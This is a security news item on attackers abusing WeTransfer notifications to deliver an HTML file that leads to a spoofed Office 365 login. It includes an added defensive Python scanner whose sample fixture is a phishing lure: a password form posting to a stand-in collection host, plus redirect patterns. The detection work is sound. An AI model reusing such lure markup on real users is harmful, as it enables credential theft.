A phishing campaign is abusing the legitimate file hosting site WeTransfer to get malicious links through email filters, according to Jake Longden at Cofense. The attackers send real WeTransfer notifications via email, which inform recipients that someone has shared a file with them.
WeTransfer lets senders add a comment to these notification emails to give the link context, and the attackers use this feature to tell the victim that the file is important.
When a victim clicks the link to receive their file, they’ll be taken to a WeTransfer page that will in turn download an HTML file. Opening this file will take the victim to the phishing page, which in this case spoofs an Office 365 login page.
The important thing to note here is that the entire delivery method is legitimate, so most email filters aren’t watching out for this behavior.
“As WeTransfer is a well-known and trusted file hosting system, used to share files too large to attach to an email, these links will typically bypass gateways as benign emails, unless settings are modified to restrict access to such file sharing sites,” Longden writes. “The PDC has observed this attack method to bypass multiple gateways.”
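Because the gateway sees only a genuine WeTransfer notification, the downloaded HTML file is the first artifact a defender can inspect. The triage sketch below is an added example, not code from Cofense or the original article: it flags a local HTML file that forwards the reader to a remote page or posts a password field to another host. The sample markup, the `example.invalid` hostnames and the function names are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Script navigation to an absolute URL: location[.href] = "..." / location.replace("...")
JS_NAV = re.compile(
    r"""location(?:\.href)?\s*(?:=|\.(?:replace|assign)\()\s*["'](https?://[^"']+)""", re.I)
META_URL = re.compile(r"url\s*=\s*['\"]?(https?://[^'\"\s>]+)", re.I)

# Constructed sample standing in for the downloaded HTML file (not from the campaign).
SAMPLE = """<html><head>
<meta http-equiv="refresh" content="0; url=https://login.example.invalid/o365">
<script>window.location.href = "https://login.example.invalid/o365";</script>
</head><body>
<form action="https://collect.example.invalid/post" method="post">
<input type="text" name="user"><input type="password" name="pw">
</form></body></html>"""

class LureScanner(HTMLParser):
    """Records meta-refresh targets and password forms that post to a remote host."""

    def __init__(self):
        super().__init__()
        self.findings = []        # (indicator, hostname) tuples
        self._form_action = None  # action of the form currently open, if any

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = META_URL.search(a.get("content", ""))
            if m:
                self.findings.append(("meta-refresh", urlparse(m.group(1)).hostname))
        elif tag == "form":
            self._form_action = a.get("action", "")
        elif tag == "input" and a.get("type", "").lower() == "password":
            if (self._form_action or "").lower().startswith(("http://", "https://")):
                self.findings.append(("password-form", urlparse(self._form_action).hostname))

    def handle_endtag(self, tag):
        if tag == "form":
            self._form_action = None

def scan_html(text):
    """Return indicators that a local HTML file hands the user off to a remote page."""
    scanner = LureScanner()
    scanner.feed(text)
    scanner.close()
    hits = [("js-redirect", urlparse(u).hostname) for u in JS_NAV.findall(text)]
    return scanner.findings + hits
```

Any finding on an HTML file that arrived through a file-sharing download is a reason to detonate it in a sandbox before a user opens it; an empty result does not clear the file, since obfuscated script is not decoded here.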
As security technologies adapt to known vectors of attack, threat actors are increasingly taking advantage of legitimate services to carry out phishing attacks. New-school security awareness training can help your employees keep up with new phishing techniques.

Source: https://cofense.com/phishing-attackers-abusing-wetransfer-evade-email-gateways/